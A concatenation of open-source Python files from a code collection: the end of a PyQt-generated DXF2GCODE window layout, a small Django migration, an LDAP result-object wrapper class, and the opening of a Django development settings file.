self.zFinalMillDepthLineEdit.setSizePolicy(sizePolicy)
self.zFinalMillDepthLineEdit.setObjectName("zFinalMillDepthLineEdit")
self.gridLayout.addWidget(self.zFinalMillDepthLineEdit, 6, 1, 1, 1)
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_9.setSpacing(2)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.label_5 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_5.setObjectName("label_5")
self.horizontalLayout_9.addWidget(self.label_5)
self.unitLabel_4 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_4.setText("[mm]")
self.unitLabel_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_4.setObjectName("unitLabel_4")
self.horizontalLayout_9.addWidget(self.unitLabel_4)
self.gridLayout.addLayout(self.horizontalLayout_9, 3, 0, 1, 1)
self.zRetractionArealLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zRetractionArealLineEdit.sizePolicy().hasHeightForWidth())
self.zRetractionArealLineEdit.setSizePolicy(sizePolicy)
self.zRetractionArealLineEdit.setObjectName("zRetractionArealLineEdit")
self.gridLayout.addWidget(self.zRetractionArealLineEdit, 2, 1, 1, 1)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_8.setSpacing(2)
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.label_6 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_6.setObjectName("label_6")
self.horizontalLayout_8.addWidget(self.label_6)
self.unitLabel_3 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_3.setText("[mm]")
self.unitLabel_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_3.setObjectName("unitLabel_3")
self.horizontalLayout_8.addWidget(self.unitLabel_3)
self.gridLayout.addLayout(self.horizontalLayout_8, 2, 0, 1, 1)
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_10.setSpacing(2)
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.label_14 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_14.setObjectName("label_14")
self.horizontalLayout_10.addWidget(self.label_14)
self.unitLabel_5 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_5.setText("[mm]")
self.unitLabel_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_5.setObjectName("unitLabel_5")
self.horizontalLayout_10.addWidget(self.unitLabel_5)
self.gridLayout.addLayout(self.horizontalLayout_10, 4, 0, 1, 1)
self.g1FeedZLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.g1FeedZLineEdit.sizePolicy().hasHeightForWidth())
self.g1FeedZLineEdit.setSizePolicy(sizePolicy)
self.g1FeedZLineEdit.setObjectName("g1FeedZLineEdit")
self.gridLayout.addWidget(self.g1FeedZLineEdit, 8, 1, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_6.setSpacing(2)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.startAtXLabel = QtWidgets.QLabel(self.millSettingsFrame)
self.startAtXLabel.setObjectName("startAtXLabel")
self.horizontalLayout_6.addWidget(self.startAtXLabel)
self.unitLabel_1 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_1.setText("[mm]")
self.unitLabel_1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_1.setObjectName("unitLabel_1")
self.horizontalLayout_6.addWidget(self.unitLabel_1)
self.gridLayout.addLayout(self.horizontalLayout_6, 0, 0, 1, 1)
self.startAtYLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startAtYLineEdit.sizePolicy().hasHeightForWidth())
self.startAtYLineEdit.setSizePolicy(sizePolicy)
self.startAtYLineEdit.setObjectName("startAtYLineEdit")
self.gridLayout.addWidget(self.startAtYLineEdit, 1, 1, 1, 1)
self.g1FeedXYLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.g1FeedXYLineEdit.sizePolicy().hasHeightForWidth())
self.g1FeedXYLineEdit.setSizePolicy(sizePolicy)
self.g1FeedXYLineEdit.setObjectName("g1FeedXYLineEdit")
self.gridLayout.addWidget(self.g1FeedXYLineEdit, 7, 1, 1, 1)
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_14.setSpacing(2)
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.label_10 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_10.setWordWrap(True)
self.label_10.setObjectName("label_10")
self.horizontalLayout_14.addWidget(self.label_10)
self.unitLabel_9 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_9.setText("[mm/min]")
self.unitLabel_9.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_9.setObjectName("unitLabel_9")
self.horizontalLayout_14.addWidget(self.unitLabel_9)
self.gridLayout.addLayout(self.horizontalLayout_14, 8, 0, 1, 1)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_7.setSpacing(2)
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.startAtYLabel = QtWidgets.QLabel(self.millSettingsFrame)
self.startAtYLabel.setObjectName("startAtYLabel")
self.horizontalLayout_7.addWidget(self.startAtYLabel)
self.unitLabel_2 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_2.setText("[mm]")
self.unitLabel_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_2.setObjectName("unitLabel_2")
self.horizontalLayout_7.addWidget(self.unitLabel_2)
self.gridLayout.addLayout(self.horizontalLayout_7, 1, 0, 1, 1)
self.startAtXLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startAtXLineEdit.sizePolicy().hasHeightForWidth())
self.startAtXLineEdit.setSizePolicy(sizePolicy)
self.startAtXLineEdit.setObjectName("startAtXLineEdit")
self.gridLayout.addWidget(self.startAtXLineEdit, 0, 1, 1, 1)
self.verticalLayout_4.addLayout(self.gridLayout)
self.verticalLayout_5.addWidget(self.millSettingsFrame)
self.mytabWidget.addTab(self.tab_2, "")
self.canvas = Canvas(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(7)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.canvas.sizePolicy().hasHeightForWidth())
self.canvas.setSizePolicy(sizePolicy)
self.canvas.setMinimumSize(QtCore.QSize(200, 200))
self.canvas.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
self.canvas.setObjectName("canvas")
self.verticalLayout.addWidget(self.splitter)
self.messageBox = MessageBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.messageBox.sizePolicy().hasHeightForWidth())
self.messageBox.setSizePolicy(sizePolicy)
self.messageBox.setMaximumSize(QtCore.QSize(16777215, 100))
self.messageBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.messageBox.setObjectName("messageBox")
self.verticalLayout.addWidget(self.messageBox)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuExport = QtWidgets.QMenu(self.menubar)
self.menuExport.setEnabled(True)
self.menuExport.setObjectName("menuExport")
self.menuView = QtWidgets.QMenu(self.menubar)
self.menuView.setObjectName("menuView")
self.menuTolerances = QtWidgets.QMenu(self.menubar)
self.menuTolerances.setObjectName("menuTolerances")
self.menuMachine_Type = QtWidgets.QMenu(self.menuTolerances)
self.menuMachine_Type.setObjectName("menuMachine_Type")
self.menuHelp = QtWidgets.QMenu(self.menubar)
self.menuHelp.setObjectName("menuHelp")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtWidgets.QAction(MainWindow)
self.actionOpen.setObjectName("actionOpen")
self.actionClose = QtWidgets.QAction(MainWindow)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/images/delete.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionClose.setIcon(icon5)
self.actionClose.setObjectName("actionClose")
self.actionShowPathDirections = QtWidgets.QAction(MainWindow)
self.actionShowPathDirections.setCheckable(True)
self.actionShowPathDirections.setChecked(False)
self.actionShowPathDirections.setEnabled(False)
self.actionShowPathDirections.setObjectName("actionShowPathDirections")
self.actionShowDisabledPaths = QtWidgets.QAction(MainWindow)
self.actionShowDisabledPaths.setCheckable(True)
self.actionShowDisabledPaths.setChecked(False)
self.actionShowDisabledPaths.setEnabled(False)
self.actionShowDisabledPaths.setObjectName("actionShowDisabledPaths")
self.actionAutoscale = QtWidgets.QAction(MainWindow)
self.actionAutoscale.setEnabled(False)
self.actionAutoscale.setObjectName("actionAutoscale")
self.actionDeleteG0Paths = QtWidgets.QAction(MainWindow)
self.actionDeleteG0Paths.setEnabled(False)
self.actionDeleteG0Paths.setObjectName("actionDeleteG0Paths")
self.actionConfiguration = QtWidgets.QAction(MainWindow)
self.actionConfiguration.setObjectName("actionConfiguration")
self.actionConfigurationPostprocessor = QtWidgets.QAction(MainWindow)
self.actionConfigurationPostprocessor.setObjectName("actionConfigurationPostprocessor")
self.actionTolerances = QtWidgets.QAction(MainWindow)
self.actionTolerances.setObjectName("actionTolerances")
self.actionScaleAll = QtWidgets.QAction(MainWindow)
self.actionScaleAll.setEnabled(False)
self.actionScaleAll.setObjectName("actionScaleAll")
self.actionRotateAll = QtWidgets.QAction(MainWindow)
self.actionRotateAll.setEnabled(False)
self.actionRotateAll.setObjectName("actionRotateAll")
self.actionMoveWorkpieceZero = QtWidgets.QAction(MainWindow)
self.actionMoveWorkpieceZero.setEnabled(False)
self.actionMoveWorkpieceZero.setObjectName("actionMoveWorkpieceZero")
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionOptimizePaths = QtWidgets.QAction(MainWindow)
self.actionOptimizePaths.setEnabled(False)
self.actionOptimizePaths.setObjectName("actionOptimizePaths")
self.actionExportShapes = QtWidgets.QAction(MainWindow)
self.actionExportShapes.setEnabled(False)
self.actionExportShapes.setObjectName("actionExportShapes")
self.actionOptimizeAndExportShapes = QtWidgets.QAction(MainWindow)
self.actionOptimizeAndExportShapes.setEnabled(False)
self.actionOptimizeAndExportShapes.setObjectName("actionOptimizeAndExportShapes")
self.actionLiveUpdateExportRoute = QtWidgets.QAction(MainWindow)
self.actionLiveUpdateExportRoute.setCheckable(True)
self.actionLiveUpdateExportRoute.setEnabled(False)
self.actionLiveUpdateExportRoute.setObjectName("actionLiveUpdateExportRoute")
self.actionReload = QtWidgets.QAction(MainWindow)
self.actionReload.setEnabled(False)
self.actionReload.setObjectName("actionReload")
self.actionSplitLineSegments = QtWidgets.QAction(MainWindow)
self.actionSplitLineSegments.setCheckable(True)
self.actionSplitLineSegments.setObjectName("actionSplitLineSegments")
self.actionAutomaticCutterCompensation = QtWidgets.QAction(MainWindow)
self.actionAutomaticCutterCompensation.setCheckable(True)
self.actionAutomaticCutterCompensation.setEnabled(False)
self.actionAutomaticCutterCompensation.setObjectName("actionAutomaticCutterCompensation")
self.actionMilling = QtWidgets.QAction(MainWindow)
self.actionMilling.setCheckable(True)
self.actionMilling.setObjectName("actionMilling")
self.actionDragKnife = QtWidgets.QAction(MainWindow)
self.actionDragKnife.setCheckable(True)
self.actionDragKnife.setObjectName("actionDragKnife")
self.actionLathe = QtWidgets.QAction(MainWindow)
self.actionLathe.setCheckable(True)
self.actionLathe.setObjectName("actionLathe")
self.actionTopView = QtWidgets.QAction(MainWindow)
self.actionTopView.setEnabled(False)
self.actionTopView.setObjectName("actionTopView")
self.actionIsometricView = QtWidgets.QAction(MainWindow)
self.actionIsometricView.setEnabled(False)
self.actionIsometricView.setObjectName("actionIsometricView")
self.actionSaveProjectAs = QtWidgets.QAction(MainWindow)
self.actionSaveProjectAs.setEnabled(False)
self.actionSaveProjectAs.setObjectName("actionSaveProjectAs")
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionReload)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionSaveProjectAs)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionClose)
self.menuExport.addAction(self.actionOptimizePaths)
self.menuExport.addAction(self.actionExportShapes)
self.menuExport.addAction(self.actionOptimizeAndExportShapes)
self.menuView.addAction(self.actionShowPathDirections)
self.menuView.addAction(self.actionShowDisabledPaths)
self.menuView.addSeparator()
self.menuView.addAction(self.actionLiveUpdateExportRoute)
self.menuView.addAction(self.actionDeleteG0Paths)
self.menuView.addSeparator()
self.menuView.addAction(self.actionAutoscale)
self.menuView.addAction(self.actionTopView)
self.menuView.addAction(self.actionIsometricView)
self.menuMachine_Type.addAction(self.actionMilling)
self.menuMachine_Type.addAction(self.actionLathe)
self.menuMachine_Type.addAction(self.actionDragKnife)
self.menuTolerances.addAction(self.actionConfiguration)
self.menuTolerances.addAction(self.actionConfigurationPostprocessor)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionTolerances)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionScaleAll)
self.menuTolerances.addAction(self.actionRotateAll)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionMoveWorkpieceZero)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionSplitLineSegments)
self.menuTolerances.addAction(self.actionAutomaticCutterCompensation)
self.menuTolerances.addAction(self.menuMachine_Type.menuAction())
self.menuHelp.addAction(self.actionAbout)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuExport.menuAction())
self.menubar.addAction(self.menuView.menuAction())
self.menubar.addAction(self.menuTolerances.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
self.mytabWidget.setCurrentIndex(0)
self.layersCollapsePushButton.clicked.connect(self.layersShapesTreeView.collapseAll)
self.layersExpandPushButton.clicked.connect(self.layersShapesTreeView.expandAll)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.mytabWidget, self.entitiesTreeView)
MainWindow.setTabOrder(self.entitiesTreeView, self.blocksCollapsePushButton)
MainWindow.setTabOrder(self.blocksCollapsePushButton, self.blocksExpandPushButton)
MainWindow.setTabOrder(self.blocksExpandPushButton, self.canvas)
MainWindow.setTabOrder(self.canvas, self.messageBox)
MainWindow.setTabOrder(self.messageBox, self.layersShapesTreeView)
MainWindow.setTabOrder(self.layersShapesTreeView, self.layersCollapsePushButton)
MainWindow.setTabOrder(self.layersCollapsePushButton, self.layersExpandPushButton)
MainWindow.setTabOrder(self.layersExpandPushButton, self.layersGoUpPushButton)
MainWindow.setTabOrder(self.layersGoUpPushButton, self.layersGoDownPushButton)
MainWindow.setTabOrder(self.layersGoDownPushButton, self.toolDiameterComboBox)
MainWindow.setTabOrder(self.toolDiameterComboBox, self.startAtXLineEdit)
MainWindow.setTabOrder(self.startAtXLineEdit, self.startAtYLineEdit)
MainWindow.setTabOrder(self.startAtYLineEdit, self.zRetractionArealLineEdit)
MainWindow.setTabOrder(self.zRetractionArealLineEdit, self.zSafetyMarginLineEdit)
MainWindow.setTabOrder(self.zSafetyMarginLineEdit, self.zInitialMillDepthLineEdit)
MainWindow.setTabOrder(self.zInitialMillDepthLineEdit, self.zInfeedDepthLineEdit)
MainWindow.setTabOrder(self.zInfeedDepthLineEdit, self.zFinalMillDepthLineEdit)
MainWindow.setTabOrder(self.zFinalMillDepthLineEdit, self.g1FeedXYLineEdit)
MainWindow.setTabOrder(self.g1FeedXYLineEdit, self.g1FeedZLineEdit)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "DXF2GCODE"))
self.blocksCollapsePushButton.setToolTip(_translate("MainWindow", "Collapse all items"))
self.blocksExpandPushButton.setToolTip(_translate("MainWindow", "Expand all items"))
self.mytabWidget.setTabText(self.mytabWidget.indexOf(self.tab), _translate("MainWindow", "Entities"))
self.layersCollapsePushButton.setToolTip(_translate("MainWindow", "Collapse all items"))
self.layersExpandPushButton.setToolTip(_translate("MainWindow", "Expand all items"))
self.layersGoUpPushButton.setToolTip(_translate("MainWindow", "Move-up the selected shape/layer"))
self.layersGoDownPushButton.setToolTip(_translate("MainWindow", "Move-down the selected shape/layer"))
self.label_11.setText(_translate("MainWindow", "⌀"))
self.label_12.setText(_translate("MainWindow", "/ speed "))
self.label_13.setText(_translate("MainWindow", "start rad. (comp) "))
self.zInitialMillDepthLineEdit.setToolTip(_translate("MainWindow", "Milling will start at Z = \"Workpiece top Z\" - \"Z infeed depth\""))
self.label_7.setText(_translate("MainWindow", "Feed rate XY"))
self.label_8.setText(_translate("MainWindow", "Z Final mill depth"))
self.label_9.setText(_translate("MainWindow", "Z Infeed depth"))
self.label_5.setText(_translate("MainWindow", "Z Safety margin"))
self.label_6.setText(_translate("MainWindow", "Z Retraction area"))
self.label_14.setText(_translate("MainWindow", "Z Workpiece top"))
self.startAtXLabel.setText(_translate("MainWindow", "Start X"))
self.label_10.setText(_translate("MainWindow", "Feed rate Z"))
self.startAtYLabel.setText(_translate("MainWindow", "Start Y"))
self.mytabWidget.setTabText(self.mytabWidget.indexOf(self.tab_2), _translate("MainWindow", "Layers"))
self.menuFile.setTitle(_translate("MainWindow", "File"))
self.menuExport.setStatusTip(_translate("MainWindow", "Export the current project to G-Code"))
self.menuExport.setTitle(_translate("MainWindow", "Export"))
self.menuView.setTitle(_translate("MainWindow", "View"))
self.menuTolerances.setTitle(_translate("MainWindow", "Options"))
self.menuMachine_Type.setTitle(_translate("MainWindow", "Machine Type"))
self.menuHelp.setTitle(_translate("MainWindow", "Help"))
self.actionOpen.setText(_translate("MainWindow", "Open..."))
self.actionOpen.setStatusTip(_translate("MainWindow", "Load DXF or other supported document"))
self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+O"))
self.actionClose.setText(_translate("MainWindow", "Exit"))
self.actionClose.setStatusTip(_translate("MainWindow", "Exit DXF2GCODE and close window"))
self.actionClose.setShortcut(_translate("MainWindow", "Ctrl+Q"))
self.actionShowPathDirections.setText(_translate("MainWindow", "Show Path Directions"))
self.actionShowPathDirections.setStatusTip(_translate("MainWindow", "Always shows the path direction in the plot (not only while selected)"))
self.actionShowDisabledPaths.setText(_translate("MainWindow", "Show Disabled Paths"))
self.actionAutoscale.setText(_translate("MainWindow", "Autoscale"))
self.actionAutoscale.setShortcut(_translate("MainWindow", "Ctrl+V, A"))
self.actionDeleteG0Paths.setText(_translate("MainWindow", "Delete G0 Paths"))
self.actionConfiguration.setText(_translate("MainWindow", "Configuration..."))
self.actionConfiguration.setShortcut(_translate("MainWindow", "Ctrl+Shift+C"))
self.actionConfigurationPostprocessor.setText(_translate("MainWindow", "Postprocessor configuration..."))
self.actionConfigurationPostprocessor.setShortcut(_translate("MainWindow", "Ctrl+Shift+P"))
self.actionTolerances.setText(_translate("MainWindow", "Tolerances"))
self.actionScaleAll.setText(_translate("MainWindow", "Scale All"))
self.actionRotateAll.setText(_translate("MainWindow", "Rotate All"))
self.actionMoveWorkpieceZero.setText(_translate("MainWindow", "Move Workpiece Zero"))
self.actionAbout.setText(_translate("MainWindow", "About"))
self.actionOptimizePaths.setText(_translate("MainWindow", "Optimize Paths"))
self.actionOptimizePaths.setShortcut(_translate("MainWindow", "Ctrl+Shift+O"))
self.actionExportShapes.setText(_translate("MainWindow", "Export Shapes"))
self.actionExportShapes.setShortcut(_translate("MainWindow", "Ctrl+Shift+E"))
self.actionOptimizeAndExportShapes.setText(_translate("MainWindow", "Optimize and Export Shapes"))
self.actionOptimizeAndExportShapes.setShortcut(_translate("MainWindow", "Ctrl+E"))
self.actionLiveUpdateExportRoute.setText(_translate("MainWindow", "Live Update Export Route"))
self.actionReload.setText(_translate("MainWindow", "Reload"))
self.actionReload.setShortcut(_translate("MainWindow", "Ctrl+R"))
self.actionSplitLineSegments.setText(_translate("MainWindow", "Split Line Segments"))
self.actionSplitLineSegments.setStatusTip(_translate("MainWindow", "Split line segments, e.g. can be used for compensation (G41/G42) in combination with EMC"))
self.actionAutomaticCutterCompensation.setText(_translate("MainWindow", "Automatic Cutter Compensation"))
self.actionMilling.setText(_translate("MainWindow", "Milling"))
self.actionDragKnife.setText(_translate("MainWindow", "Drag Knife"))
self.actionLathe.setText(_translate("MainWindow", "Lathe"))
self.actionTopView.setText(_translate("MainWindow", "Top View"))
self.actionTopView.setShortcut(_translate("MainWindow", "Ctrl+V, T"))
self.actionIsometricView.setText(_translate("MainWindow", "Isometric View"))
self.actionIsometricView.setShortcut(_translate("MainWindow", "Ctrl+V, I"))
self.actionSaveProjectAs.setText(_translate("MainWindow", "Save Project As..."))
self.actionSaveProjectAs.setShortcut(_translate("MainWindow", "Ctrl+S"))
from gui.canvas import Canvas
from gui.messagebox import MessageBox
from gui.treeview import TreeView
import dxf2gcode_images5_rc
| hehongyu1995/Dxf2GCode | dxf2gcode_ui5.py | Python | gpl-3.0 | 45,029 |
# Generated by Django 2.2.7 on 2020-02-07 20:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("enhydris", "0030_abolish_instruments"),
]
operations = [
migrations.AlterModelOptions(
name="unitofmeasurement", options={"ordering": ["symbol"]}
),
]
| openmeteo/enhydris | enhydris/migrations/0031_change_unitofmeasurement_meta.py | Python | agpl-3.0 | 347 |
import ldap
import ldif
from ldap.cidict import cidict
from io import StringIO
from uuid import UUID
class CustomCidict(cidict):
def __getitem__(self, key):
"""Override of the __getitem__ method to return an empty list if a key
does not exist (instead of raising an exception)
"""
if key.lower() in self.data:
return self.data[key.lower()]
return []
class LdapprObject(object):
"""\
The LdapprObject is used to handle search results from the Connection
class. It's a representation of a single object in the LDAP Directory.
"""
guid = None
def __init__(self, result, conn):
"""The class is initialized with a tuple: (dn, {attributes}), and the
existing connection
"""
(self.dn, self.attributes) = result
self.attrs = CustomCidict(self.attributes)
if 'objectguid' in [x.lower() for x in list(self.attrs.keys())]:
self.guid = str(UUID(bytes=self.attrs['objectguid'][0]))
self.conn = conn
def __str__(self):
"""Pretty prints all attributes with values."""
col_width = max(len(key) for key in list(self.attrs.keys()))
pretty_string = '{attr:{width}} : {value}\n'.format(
attr='dn', width=col_width, value=self.dn)
for key, value in list(self.attrs.items()):
if len(str(value[0])) > 80: # hack to 'detect' binary attrs
value = ['binary']
for single_value in value:
pretty_string += '{attr:{width}} : {value}\n'.format(
attr=self._case(key), width=col_width, value=single_value)
key = ''
return pretty_string
def _case(self, attr):
"""Transforms an attribute to correct case (e.g. gIvEnNaMe becomes
givenName). If attr is unknown nothing is transformed.
:param attr: may be incorrectly cased
:return: attr in proper case
"""
try:
index = [x.lower() for x in list(self.attrs.keys())].index(attr.lower())
return list(self.attrs.keys())[index]
except:
return attr
def to_ldif(self):
"""Makes LDIF of ldappr object."""
out = StringIO()
ldif_out = ldif.LDIFWriter(out)
ldif_out.unparse(self.dn, self.attributes)
return out.getvalue()
def set_value(self, attr, value):
attr = self._case(attr)
self.conn.modify_s(self.dn, [(ldap.MOD_REPLACE, attr, value)])
self.attrs[attr] = [value]
def add_value(self, attr, value):
attr = self._case(attr)
self.conn.modify_s(self.dn, [(ldap.MOD_ADD, attr, value)])
self.attrs[attr].append(value)
def remove_value(self, attr, value):
attr = self._case(attr)
self.conn.modify_s(self.dn, [(ldap.MOD_DELETE, attr, value)])
if value in self.attrs[attr]:
self.attrs[attr].remove(value)
| nanu2/ldappr | ldappr/ldapprobject.py | Python | isc | 2,946 |
"""
Django settings for cloudmesh_portal project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
from django.contrib.messages import constants as message_constants
SITE_ID = 1
# BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
# Include BOOTSTRAP3_FOLDER in path
BOOTSTRAP3_FOLDER = os.path.abspath(os.path.join(BASE_DIR, '..', 'bootstrap3'))
if BOOTSTRAP3_FOLDER not in sys.path:
sys.path.insert(0, BOOTSTRAP3_FOLDER)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gw=857%2gacc+b08kvygbsmvt+#(o51nw@40t2uk3xei2@qzzk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
MESSAGE_TAGS = {message_constants.DEBUG: 'debug',
message_constants.INFO: 'info',
message_constants.SUCCESS: 'success',
message_constants.WARNING: 'warning',
message_constants.ERROR: 'danger',}
INSTALLED_APPS = (
# 'django_admin_bootstrapped.bootstrap3',
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
'rest_framework',
'rest_framework_swagger',
)
# INSTALLED_APPS += ('bootstrap3',)
# INSTALLED_APPS += ('bootstrap_themes',)
INSTALLED_APPS += ('django_jinja',)
# INSTALLED_APPS += ('bootstrapform_jinja',)
INSTALLED_APPS += ('django_jinja.contrib._humanize',)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware'
)
ROOT_URLCONF = 'cloudmesh_portal.urls'
# os.path.join(BASE_DIR, 'templates'),
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
'DIRS': [os.path.join(BASE_DIR, 'cloudmesh_portal', 'templates')],
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".jinja",
"environment":"cloudmesh_portal.jinjaconfig.environment",
}
},
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'cloudmesh_portal', 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cloudmesh_portal.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
# noinspection PyRedeclaration
ALLOWED_HOSTS = ['localhost', '127.0.0.1', ]
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
